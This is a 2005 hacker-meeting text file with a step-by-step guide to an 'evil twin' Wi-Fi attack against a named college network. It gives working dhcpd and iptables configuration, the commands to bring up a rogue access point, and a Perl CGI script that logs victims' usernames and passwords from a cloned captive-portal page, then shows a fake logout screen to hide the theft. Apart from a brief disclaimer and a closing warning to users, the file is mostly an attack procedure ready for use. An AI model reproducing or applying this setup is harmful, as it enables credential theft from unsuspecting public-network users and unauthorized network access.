. .
/ / . . \ \
| | ( ( ACCESS POINT IN THE MIDDLE ) ) | |
\ \ ' ' / /
' ezod '05 '
.----------------------------------------------------.
| Windsor 2600 Meeting |
| First Friday of the Month, CAW Student Centre, 7PM |
'----------------------------------------------------'
(( INTRODUCTION ))
You sit down in some public place, and fire up your laptop with the wireless
network adapter. It picks up a strong signal from a public access point
right in the building. Figuring you'll kill some time by reading Slashdot,
you load your browser and type in the URL, only to have something that is
definitely not Slashdot appear in the window. It's a web-based login prompt,
and your port 80 traffic doesn't get routed until you fill it in.
Most people without an account would just frown, and click Start, Turn Off
Computer. But you're not most people, and besides, your laptop isn't running
Windows (otherwise you're on your own). You're just going to have to find
something to fill the prompt in with.
(( THE CONCEPT ))
Lest we forget, everything past this point is simply an exercise in thinking
related to a hypothetical situation. Actually applying this technique could
be unethical; consult your conscience for more information.
. _____ _____
\ / . \ \ | | . . | |
_\___/_ ) ) | | |_____| . \ \ / / . |_____|
|. .....| ' / / / \ ) ) | | | | ( ( / \
|_______| ' /_______\ ' / / \ \ ' /_______\
' '
r33l AP j00 l3g1t1m4t3 lu53r
What we're going to do here is insert our own temporary access point that
looks like the one we're trying to connect to, and scoop an account or two
from the legitimate users who try to connect to it. We'll also try to keep
said legitimate users (and the sysops of the real access point) in the dark
about the whole thing. Basically, here's what we need to do:
1. Set up a fake access point that broadcasts the same ESSID as the
real one.
2. Get a legitimate user to pick up our fake access point instead of
the real one (we have to position our AP in such a way that it
provides a stronger signal).
3. Provide a DHCP reply to the legitimate user so he or she is
networked to our AP's host.
4. Redirect any WWW requests from the legitimate user's machine to a
web server on our machine, which will conveniently display a page
that looks just like the real AP's login prompt but works quite
differently.
5. Dispel any concerns on the part of the legitimate user stemming
from the lack of web access despite correct authentication.
(( MATERIALS ))
To do this, we will more or less obviously need the aforementioned laptop
with wireless network adapter (which must be capable of operating in Master
mode), a DHCP server, an HTTP server, and some facility for packet filtering
and network address and port translation. For this example we will use a
Gentoo Linux box with a prism54-supported PCMCIA WLAN card, using dhcpd,
Apache and iptables.
(( PROCEDURE ))
First, let's collect some information about the AP we're trying to fake. The
Windsor Clown College wireless system will make a good example target.
Here's what we need to know about that system:
- ESSID: WinClown
- Gateway IP Address: 10.0.0.1
- DHCP Range: 10.0.0.100 - 10.0.0.255
We can grab the authentication page (with its stylesheet and graphics) from
the following URL:
http://10.0.0.1/auth/index.html
Finally, we can figure out where the actual WinClown access points are
located by reading the College's wireless site (www.winclown.ca/wireless)
and doing a little testing to see how strong the signals are in various
places.
Now let's set up our web server. We'll just copy the authentication page,
making sure it looks the same as the original, but we'll have the HTML form
POST its results to a CGI script like this one (written in Perl):
#!/usr/bin/perl
$logfile = "/home/ezod/winclown.log";
print qq~
Content-type: text/html
Logout Successful
~;
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
open(LOG,">>$logfile");
print LOG $buffer;
close(LOG);
This script will append the entered username and password to a log file from
which we can retrieve it later. It will also display the "Logout Successful"
screen (which normally appears when a user logs out of the Aruba system) to
at least avoid giving away the existence of our AP. If we were really
paranoid, or not planning on paying attention, we could have the AP shut
down after the first login attempt, but then we run the risk of getting a
bad username and password combination.
Next, let's edit our dhcpd.conf so that (a) our legitimate users can
actually connect to the fake access point, and (b) they get a host
configuration that looks similar to what the real AP would provide. There
should be a subnet entry something like the following:
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.255;
option domain-name-servers ns1.winclown.ca;
option domain-name "winclown.ca";
option routers 10.0.0.2;
option broadcast-address 10.0.0.255;
default-lease-time 600;
max-lease-time 7200;
}
Now we need to configure the NAT table so that all incoming requests on port
80 are redirected to the web server on our fake AP:
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT
# /etc/init.d/iptables save
Everything should be ready to go now. Let's start up the fake access point
and see what happens:
# iwconfig eth1 mode Master
# iwconfig eth1 essid WinClown
# ifconfig eth1 10.0.0.2 netmask 255.255.255.0
# /etc/init.d/iptables start
# dhcpd
# apache2ctl start
If we want to see interactively when a legitimate user tries to authenticate
and we get a username and password, we can tail the logfile in a terminal.
(( CONCLUSION ))
Pay attention when using a site's wireless network. In spite of security
measures intended to render this type of attack ineffective, a user's
carelessness is ultimately its prey.
::: mavrinac.com